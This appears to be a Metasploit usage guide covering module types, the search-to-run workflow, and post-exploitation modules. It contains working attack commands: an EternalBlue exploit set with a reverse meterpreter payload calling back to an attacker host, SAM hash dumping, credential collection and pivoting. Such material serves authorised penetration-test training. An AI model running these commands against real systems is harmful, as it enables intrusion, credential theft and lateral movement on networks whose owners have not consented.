Modules
Module Typesβ
| Type | Path Prefix | Purpose |
|---|---|---|
exploit | exploit/ | Delivers a payload by exploiting a vulnerability |
auxiliary | auxiliary/ | Scanning, enumeration, fuzzing, credential testing - no payload |
post | post/ | Post-exploitation actions run against an established session |
payload | payload/ | Code executed on the target after exploitation |
encoder | encoder/ | Obfuscates payload to evade signature detection |
nop | nop/ | NOP sled generators - rarely used directly |
The Standard Workflowβ
search β use β info β show options β set β [show payloads] β set PAYLOAD β run
Step by Stepβ
# 1. Find the module
msf6 > search ms17_010
# 2. Select it (use index number or full path)
msf6 > use 0
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# 3. Review what it does and what it needs
msf6 (exploit/windows/smb/ms17_010_eternalblue) > info
# 4. See all required and optional settings
msf6 > show options
# 5. See available payloads for this module
msf6 > show payloads
# 6. Set options
msf6 > set RHOSTS <TARGET_IP>
msf6 > set PAYLOAD windows/x64/meterpreter_reverse_https
msf6 > set LHOST <KALI_IP>
msf6 > set LPORT 443
# 7. Verify nothing is missing
msf6 > show options
# 8. Run
msf6 > run
# or
msf6 > exploit
# Run as background job (non-blocking)
msf6 > run -j
msf6 > exploit -j
show options - Reading the Outputβ
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes Target address(es)
RPORT 445 yes Target port
SMBDomain no Domain (optional)
SMBPass no Password (optional)
SMBUser no Username (optional)
VERIFY_ARCH true yes Check target arch
VERIFY_TARGET true yes Check target OS
- Required = yes, no Current Setting β must set before running
- Required = no β optional; set if needed for the scenario
- Options already populated by
setgwill show their global values here
show targetsβ
Some exploit modules support multiple target configurations (different OS versions, service packs, offsets):
msf6 > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Target
1 Windows 7
2 Windows Embedded Standard 7
3 Windows Server 2008 R2
msf6 > set TARGET 0
Use Automatic unless you know a specific target version and need precision.
checkβ
Some exploit modules support a check command - tests if the target is vulnerable without exploiting it. Not all modules support this.
msf6 > check
[*] 10.10.10.50:445 - The target is vulnerable.
Post Modulesβ
Post modules run against an existing Meterpreter session. They perform specific actions (enumeration, credential extraction, pivoting setup) without requiring a new exploit.
# Run a post module against session 1
msf6 > use post/windows/gather/hashdump
msf6 > set SESSION 1
msf6 > run
# Shortcut from inside a Meterpreter session
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/multi/recon/local_exploit_suggester
Useful Post Modulesβ
| Module | Purpose |
|---|---|
post/windows/gather/hashdump | Dump local SAM hashes |
post/windows/gather/credentials/credential_collector | Collect cached credentials |
post/multi/recon/local_exploit_suggester | Suggest local privesc exploits for the current session |
post/windows/manage/migrate | Migrate Meterpreter to another process |
post/multi/manage/autoroute | Add routes through the session for pivoting |
post/windows/gather/enum_domain | Enumerate domain info from compromised host |
post/windows/gather/arp_scanner | ARP scan from the compromised host |
Filtering Options and Payloadsβ
When show payloads or show options returns a long list, filter with grep:
msf6 > grep meterpreter show payloads
msf6 > grep x64 show payloads
msf6 > grep required show options
Using Modules Against Multiple Targetsβ
# Set multiple individual targets
msf6 > set RHOSTS 10.10.10.50,10.10.10.51,10.10.10.52
# Set a range
msf6 > set RHOSTS 10.10.10.50-60
# Set a CIDR range
msf6 > set RHOSTS 10.10.10.0/24
# Load from a file
msf6 > set RHOSTS file:/tmp/targets.txt
# Load from DB (all hosts)
msf6 > hosts -R
Set THREADS for concurrent execution on auxiliary/scanner modules:
msf6 > set THREADS 10